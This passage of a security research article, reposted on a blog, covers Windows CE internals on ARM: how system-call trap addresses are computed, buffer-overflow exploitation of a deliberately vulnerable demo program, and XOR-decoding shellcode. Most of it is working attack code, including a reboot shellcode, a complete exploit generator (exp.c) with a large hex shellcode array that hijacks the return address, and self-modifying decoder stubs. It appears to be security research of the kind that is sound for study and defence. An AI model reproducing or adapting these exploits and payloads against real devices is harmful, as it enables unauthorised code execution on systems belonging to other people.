    .text:01F75040 PowerOffSystem                          ; CODE XREF: SetSystemPowerState+58p
    .text:01F75040                 STMFD   SP!, {R4,R5,LR}
    .text:01F75044                 LDR     R5, =0xFFFFC800
    .text:01F75048                 LDR     R4, =unk_1FC6760
    .text:01F7504C                 LDR     R0, [R5]        ; UTlsPtr
    .text:01F75050                 LDR     R1, [R0,#-0x14] ; KTHRDINFO
    .text:01F75054                 TST     R1, #1
    .text:01F75058                 LDRNE   R0, [R4]        ; 0x8004B138 ppfnMethods
    .text:01F7505C                 CMPNE   R0, #0
    .text:01F75060                 LDRNE   R1, [R0,#0x13C] ; 0x8006C92C SC_PowerOffSystem
    .text:01F75064                 LDREQ   R1, =0xF000FEC4 ; trap address of SC_PowerOffSystem
    .text:01F75068                 MOV     LR, PC
    .text:01F7506C                 MOV     PC, R1
    .text:01F75070                 LDR     R3, [R5]
    .text:01F75074                 LDR     R0, [R3,#-0x14]
    .text:01F75078                 TST     R0, #1
    .text:01F7507C                 LDRNE   R0, [R4]
    .text:01F75080                 CMPNE   R0, #0
    .text:01F75084                 LDRNE   R0, [R0,#0x25C] ; SC_KillThreadIfNeeded
    .text:01F75088                 MOVNE   LR, PC
    .text:01F7508C                 MOVNE   PC, R0
    .text:01F75090                 LDMFD   SP!, {R4,R5,PC}
    .text:01F75090 ; End of function PowerOffSystem

    Debugging into this API, we found the system will check the KTHRDINFO
    first. This value was initialized in the MDCreateMainThread2 function of
    PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c:

    ...
        if (kmode || bAllKMode) {
            pTh->ctx.Psr = KERNEL_MODE;
            KTHRDINFO (pTh) |= UTLS_INKMODE;
        } else {
            pTh->ctx.Psr = USER_MODE;
            KTHRDINFO (pTh) &= ~UTLS_INKMODE;
        }
    ...

    If the application is in kernel mode, this value will be set with 1,
    otherwise it will be 0. All applications of Pocket PC run in kernel mode,
    so the system follow by "LDRNE   R0, [R4]". In my environment, the R0 got
    0x8004B138 which is the ppfnMethods pointer of SystemAPISets[SH_WIN32],
    and then it flow to "LDRNE   R1, [R0,#0x13C]". Let's look the offset 0x13C
    (0x13C/4=0x4F) and corresponding to the index of Win32Methods defined in
    PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h:

    const PFNVOID Win32Methods[] = {
    ...
        (PFNVOID)SC_PowerOffSystem,             // 79
    ...
    };

    Well, the R1 got the address of SC_PowerOffSystem which is implemented in
    kernel. The instruction "LDREQ   R1, =0xF000FEC4" has no effect when the
    application run in kernel mode. The address 0xF000FEC4 is system call
    which used by user mode. Some APIs use system call directly, such as
    SetKMode:

    .text:01F756C0                 EXPORT SetKMode
    .text:01F756C0 SetKMode
    .text:01F756C0
    .text:01F756C0 var_4           = -4
    .text:01F756C0
    .text:01F756C0                 STR     LR, [SP,#var_4]!
    .text:01F756C4                 LDR     R1, =0xF000FE50
    .text:01F756C8                 MOV     LR, PC
    .text:01F756CC                 MOV     PC, R1
    .text:01F756D0                 LDMFD   SP!, {PC}

    Windows CE doesn't use ARM's SWI instruction to implement system call, it
    implements in different way. A system call is made to an invalid address
    in the range 0xf0000000 - 0xf0010000, and this causes a prefetch-abort
    trap, which is handled by PrefetchAbort implemented in armtrap.s.
    PrefetchAbort will check the invalid address first, if it is in trap area
    then using ObjectCall to locate the system call and executed, otherwise
    calling ProcessPrefAbort to deal with the exception.

    There is a formula to calculate the system call address:

    0xf0010000-(256*apiset+apinr)*4

    The api set handles are defined in PUBLIC\COMMON\SDK\INC\kfuncs.h and
    PUBLIC\COMMON\OAK\INC\psyscall.h, and the aipnrs are defined in several
    files, for example SH_WIN32 calls are defined in
    PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h.

    Well, let's calculate the system call of KernelIoControl. The apiset is 0
    and the apinr is 99, so the system call is 0xf0010000-(256*0+99)*4 which
    is 0xF000FE74. The following is the shellcode implemented by system call:

    #include "stdafx.h"

    int shellcode[] =
    {
    0xE59F0014, // ldr r0, [pc, #20]
    0xE59F4014, // ldr r4, [pc, #20]
    0xE3A01000, // mov r1, #0
    0xE3A02000, // mov r2, #0
    0xE3A03000, // mov r3, #0
    0xE1A0E00F, // mov lr, pc
    0xE1A0F004, // mov pc, r4
    0x0101003C, // IOCTL_HAL_REBOOT
    0xF000FE74, // trap address of KernelIoControl
    };

    int WINAPI WinMain( HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPTSTR    lpCmdLine,
                        int       nCmdShow)
    {
        ((void (*)(void)) & shellcode)();

        return 0;
    }

    It works fine and we don't need search API addresses.


    --[ 9 - Windows CE Buffer Overflow Exploitation

    The hello.cpp is the demonstration vulnerable program:

    // hello.cpp
    //

    #include "stdafx.h"

    int hello()
    {
        FILE * binFileH;
        char binFile[] = "\\binfile";
        char buf[512];

        if ( (binFileH = fopen(binFile, "rb")) == NULL )
        {
            printf("can't open file %s!\n", binFile);
            return 1;
        }

        memset(buf, 0, sizeof(buf));
        fread(buf, sizeof(char), 1024, binFileH);

        printf("%08x %d\n", &buf, strlen(buf));
        getchar();
       
        fclose(binFileH);
        return 0;
    }

    int WINAPI WinMain( HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPTSTR    lpCmdLine,
                        int       nCmdShow)
    {
        hello();
        return 0;
    }

    The hello function has a buffer overflow problem. It reads data from the
    "binfile" of the root directory to stack variable "buf" by fread().
    Because it reads 1KB contents, so if the "binfile" is larger than 512
    bytes, the stack variable "buf" will be overflowed.

    The printf and getchar are just for test. They have no effect without
    console.dll in windows direcotry. The console.dll file is come from
    Windows Mobile Developer Power Toys.

    ARM assembly language uses bl instruction to call function. Let's look
    into the hello function:

    6:    int hello()
    7:    {
    22011000   str       lr, [sp, #-4]!
    22011004   sub       sp, sp, #0x89, 30
    8:        FILE * binFileH;
    9:        char binFile[] = "\\binfile";
    ...
    ...
    26:   }
    220110C4   add       sp, sp, #0x89, 30
    220110C8   ldmia     sp!, {pc}

    "str lr, [sp, #-4]!" is the first instruction of the hello() function. It
    stores the lr register to stack, and the lr register contains the return
    address of hello caller. The second instruction prepairs stack memory for
    local variables. "ldmia sp!, {pc}" is the last instruction of the hello()
    function. It loads the return address of hello caller that stored in the
    stack to the pc register, and then the program will execute into WinMain
    function. So overwriting the lr register that is stored in the stack will
    obtain control when the hello function returned.

    The variable's memory address that allocated by program is corresponding
    to the loaded Slot, both stack and heap. The process may be loaded into
    difference Slot at each start time. So the base address always alters. We
    know that the slot 0 is mapped from the current process' slot, so the base
    of its stack address is stable.

    The following is the exploit of hello program:

    /* exp.c - Windows CE Buffer Overflow Demo
    *
    *  san@xfocus.org
    */
    #include<stdio.h>

    #define NOP 0xE1A01001  /* mov r1, r1     */
    #define LR  0x0002FC50  /* return address */

    int shellcode[] =
    {
    0xEB000026,
    0xE3A02004,
    0xEB00003A,
    0xE24DDF89,
    0xE28D0008,
    0xE58D0000,
    0xE3A03002,
    0xE3A02000,
    0xE28F1F56,
    0xE3A0010A,
    0xE1A0E00F,
    0xE518F00C,
    0xE3A00001,
    0xE58D000C,
    0xE3A03004,
    0xE58D3004,
    0xE28D100C,
    0xE58D1000,
    0xE28F1F5F,
    0xE59D0008,
    0xE1A0E00F,
    0xE518F008,
    0xE59D0008,
    0xE1A0E00F,
    0xE518F004,
    0xE28F0C01,
    0xE5900000,
    0xE3A01000,
    0xE3A02000,
    0xE3A03000,
    0xE1A0E00F,
    0xE518F010,
    0xE0D020B2,
    0xE0D130B2,
    0xE3520000,
    0x03530000,
    0x01A0F00E,
    0xE1520003,
    0x0AFFFFF8,
    0xE1A0F00E,
    0xE1A0B00E,
    0xE28F40BC,
    0xE5944000,
    0xE3A05FC9,
    0xE0845005,
    0xE5955000,
    0xE1A06005,
    0xE3A07000,
    0xE5960008,
    0xE28F1F45,
    0xEBFFFFEC,
    0x0596707C,
    0x0596808C,
    0xE0879008,
    0x0A000003,
    0xE5966004,
    0xE3560000,
    0x11560005,
    0x1AFFFFF4,
    0xE1A00007,
    0xE0881007,
    0xE1A0F00B,
    0xE28F8070,
    0xE5914020,
    0xE0844000,
    0xE3A06000,
    0xE4947004,
    0xE0877000,
    0xE3A0A000,
    0xE4D79001,
    0xE3590000,
    0x0A000001,
    0xE089A3EA,
    0xEAFFFFFA,
    0xE5989000,
    0xE15A0009,
    0x12866001,
    0x1AFFFFF3,
    0xE5915024,
    0xE0855000,
    0xE0866006,
    0xE19590B6,
    0xE591501C,
    0xE0855000,
    0xE7959109,
    0xE0899000,
    0xE4889004,
    0xE2522001,
    0x1AFFFFE5,
    0xE1A0F00E,
    0xFFFFC800,
    0x0101003C,
    0x283A9DE7,
    0x0BF7DF51,
    0xD8C0FEC0,
    0x0E511783,
    0x004F0053,
    0x00540046,
    0x00410057,
    0x00450052,
    0x005C005C,
    0x00690057,
    0x00630064,
    0x006D006F,
    0x005C006D,
    0x0042005C,
    0x00430074,
    0x006E006F,
    0x00690066,
    0x005C0067,
    0x0047005C,
    0x006E0065,
    0x00720065,
    0x006C0061,
    0x00000000,
    0x00740053,
    0x00630061,
    0x004D006B,
    0x0064006F,
    0x00000065,
    0x006F0063,
    0x00650072,
    0x006C0064,
    0x002E006C,
    0x006C0064,
    0x0000006C,
    };

    /* prints a long to a string */
    char* put_long(char* ptr, long value)
    {
        *ptr++ = (char) (value >> 0) & 0xff;
        *ptr++ = (char) (value >> 8) & 0xff;
        *ptr++ = (char) (value >> 16) & 0xff;
        *ptr++ = (char) (value >> 24) & 0xff;

        return ptr;
    }

    int main()
    {
        FILE * binFileH;
        char binFile[] = "binfile";
        char buf[544];
        char *ptr;
        int  i;

        if ( (binFileH = fopen(binFile, "wb")) == NULL )
        {
            printf("can't create file %s!\n", binFile);
            return 1;
        }

        memset(buf, 0, sizeof(buf)-1);
        ptr = buf;

        for (i = 0; i < 4; i++) {
            ptr = put_long(ptr, NOP);
        }
        memcpy(buf+16, shellcode, sizeof(shellcode));
        put_long(ptr-16+540, LR);

        fwrite(buf, sizeof(char), 544, binFileH);
        fclose(binFileH);
    }

    We choose a stack address of slot 0, and it points to our shellcode. It
    will overwrite the return address that stored in the stack. We can also
    use a jump address of virtual memory space of the process instead of. This
    exploit produces a "binfile" that will overflow the "buf" variable and the
    return address that stored in the stack.

    After the binfile copied to the PDA, the PDA restarts and open the
    bluetooth when the hello program is executed. That's means the hello
    program flowed to our shellcode.

    While I changed another method to construct the exploit string, its as
    following:

    pad...pad|return address|nop...nop...shellcode

    And the exploit produces a 1KB "binfile". But the PDA is freeze when the
    hello program is executed. It was confused, I think maybe the stack of
    Windows CE is small and the overflow string destroyed the 2KB guard on the
    top of stack. It is freeze when the program call a API after overflow
    occurred. So, we must notice the features of stack while writing exploit
    for Windows CE.

    EVC has some bugs that make debug difficult. First, EVC will write some
    arbitrary data to the stack contents when the stack releases at the end of
    function, so the shellcode maybe modified. Second, the instruction at
    breakpoint maybe change to 0xE6000010 in EVC while debugging. Another bug
    is funny, the debugger without error while writing data to a .text address
    by step execute, but it will capture a access violate exception by execute
    directly.


    --[ 10 - About Decoding Shellcode

    The shellcode we talked above is a concept shellcode which contains lots
    of zeros. It executed correctly in this demonstrate program, but some other
    vulnerable programs maybe filter the special characters before buffer
    overflow in some situations. For example overflowed by strcpy, the
    shellcode will be cut by the zero.

    It is difficult and inconvenient to write a shellcode without special
    characters by API search method. So we think about the decoding shellcode.
    Decoding shellcode will convert the special characters to fit characters
    and make the real shellcode more universal.

    The newer ARM processor(such as arm9 and arm10) has a Harvard architecture
    which separates instruction cache and data cache. This feature will
    improve the performance of processor, and most of RISC processors have
    this feature. But the self-modifying code is not easy to implement,
    because it will puzzled by the caches and the processor implementation
    after being modified.

    Let's look at the following code first:

    #include "stdafx.h"

    int weird[] =
    {
    0xE3A01099, // mov       r1, #0x99

    0xE5CF1020, // strb      r1, [pc, #0x20]
    0xE5CF1020, // strb      r1, [pc, #0x20]
    0xE5CF1020, // strb      r1, [pc, #0x20]
    0xE5CF1020, // strb      r1, [pc, #0x20]

    0xE1A01001, // mov       r1, r1 ; pad
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,

    0xE3A04001, // mov       r4, #0x1
    0xE3A03001, // mov       r3, #0x1
    0xE3A02001, // mov       r2, #0x1
    0xE3A01001, // mov       r1, #0x1
    0xE6000010, // breakpoint
    };

    int WINAPI WinMain( HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPTSTR    lpCmdLine,
                        int       nCmdShow)
    {
        ((void (*)(void)) & weird)();

        return 0;
    }

    That four strb instructions will change the immediate value of the below
    mov instructions to 0x99. It will break at that inserted breakpoint while
    executing this code in EVC debugger directly. The r1-r4 registers got 0x99
    in S3C2410 which is a arm9 core processor. It needs more nop instructions
    to pad after modified to let the r1-r4 got 0x99 while I tested this code
    in my friend's PDA which has a Intel Xscale processor. I think the reason
    maybe is that the arm9 has 5 pipelines and the arm10 has 6 pipelines. Well
    , I changed it to another method:

    0xE28F3053, // add       r3, pc, #0x53

    0xE3A01010, // mov       r1, #0x10
    0xE7D32001, // ldrb      r2, [r3, +r1]
    0xE2222088, // eor       r2, r2, #0x88
    0xE7C32001, // strb      r2, [r3, +r1]
    0xE2511001, // subs      r1, r1, #1
    0x1AFFFFFA, // bne       28011008

    //0xE1A0100F, // mov       r1, pc
    //0xE3A02020, // mov       r2, #0x20
    //0xE3A03D05, // mov       r3, #5, 26
    //0xEE071F3A, // mcr       p15, 0, r1, c7, c10, 1 ; clean and invalidate each entry
    //0xE0811002, // add       r1, r1, r2
    //0xE0533002, // subs      r3, r3, r2
    //0xCAFFFFFB, // bgt       |weird+28h (30013058)|
    //0xE0211001, // eor       r1, r1, r1
    //0xEE071F9A, // mcr       p15, 0, r1, c7, c10, 4 ; drain write buffer
    //0xEE071F15, // mcr       p15, 0, r1, c7, c5, 0  ; flush the icache
    0xE1A01001, // mov       r1, r1 ; pad
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,

    0x6B28C889, // mov       r4, #0x1 ; encoded
    0x6B28B889, // mov       r3, #0x1
    0x6B28A889, // mov       r2, #0x1
    0x6B289889, // mov       r1, #0x1
    0xE6000010, // breakpoint

    The four mov instructions were encoded by Exclusive-OR with 0x88, the
    decoder has a loop to load a encoded byte and Exclusive-OR it with 0x88
    and then stored it to the original position. The r1-r4 registers won't get
    0x1 even you put a lot of pad instructions after decoded in both arm9 and
    arm10 processors. I think maybe that the load instruction bring on a cache
    problem.

    ARM Architecture Reference Manual has a chapter to introduce how to deal
    with self-modifying code. It says the caches will be flushed by an
    operating system call. Phil, the guy from 0dd shared his experience to me.
    He said he's used this method successful on ARM system(I think his
    environment maybe is Linux). Well, this method is successful on AIX PowerPC
    and Solaris SPARC too(I've tested it). But SWI implements in a different
    way under Windows CE. The armtrap.s contains implementation of SWIHandler
    which does nothing except 'movs pc,lr'. So it has no effect after decode
    finished.

    Because Pocket PC's applications run in kernel mode, so we have privilege
    to access the system control coprocessor. ARM Architecture Reference
    Manual introduces memory system and how to handle cache via the system
    control coprocessor. After looked into this manual, I tried to disable the
    instruction cache before decode:

    mrc     p15, 0, r1, c1, c0, 0
    bic     r1, r1, #0x1000
    mcr     p15, 0, r1, c1, c0, 0

    But the system freezed when the mcr instruction executed. Then I tried to
    invalidate entire instruction cache after decoded:

    eor     r1, r1, r1
    mcr     p15, 0, r1, c7, c5, 0

    But it has no effect too.


    --[ 11 - Conclusion

    The codes talked above are the real-life buffer overflow example on
    Windows CE. It is not perfect, but I think this technology will be improved
    in the future.

    Because of the cache mechanism, the decoding shellcode is not good enough.

    Internet and handset devices are growing quickly, so threats to the PDAs
    and mobiles become more and more serious. And the patch of Windows CE is
    more difficult and dangerous than the normal Windows system to customers.
    Because the entire Windows CE system is stored in the ROM, if you want to
    patch the system flaws, you must flush the ROM, And the ROM images of
    various vendors or modes of PDAs and mobiles aren't compatible.


    --[ 12 - Greetings

    Special greets to the dudes of XFocus Team, my girlfriend, the life will
    fade without you.
    Special thanks to the Research Department of NSFocus Corporation, I love
    this team.
    And I'll show my appreciation to 0dd members, Nasiry and Flier too, the
    discussions with them were nice.


    --[ 13 - References

    [1] ARM Architecture Reference Manual
        http://www.arm.com
    [2] Windows CE 4.2 Source Code
        http://msdn.microsoft.com/embedded/windowsce/default.aspx
    [3] Details Emerge on the First Windows Mobile Virus
        - Cyrus Peikari, Seth Fogie, Ratter/29A
        http://www.informit.com/articles/article.asp?p=337071
    [4] Pocket PC Abuse - Seth Fogie
        http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-fogie/bh-us-04-fogie-up.pdf
    [5] misc notes on the xda and windows ce
        http://www.xs4all.nl/~itsme/projects/xda/
    [6] Introduction to Windows CE
        http://www.cs-ipv6.lancs.ac.uk/acsp/WinCE/Slides/
    [7] Nasiry 's way
        http://www.cnblogs.com/nasiry/
    [8] Programming Windows CE Second Edition - Doug Boling
    [9] Win32 Assembly Components
        http://LSD-PL.NET

  • 相关阅读:
    LINQ篇:查询句法
    DLINQ(五):存储过程
    DLINQ(六):探究特性
    DLINQ
    LinQ 扩展函数的应用
    Linq 入门系列 select篇
    Linq 入门系列 [Take,Skip,TakeWhile,SkipWhile]篇
    javascript导航动画效果
    javascript简单的计算器实现
    javascript简单的日历实现
  • 原文地址:https://www.cnblogs.com/nasiry/p/216668.html
Copyright © 2011-2022 走看看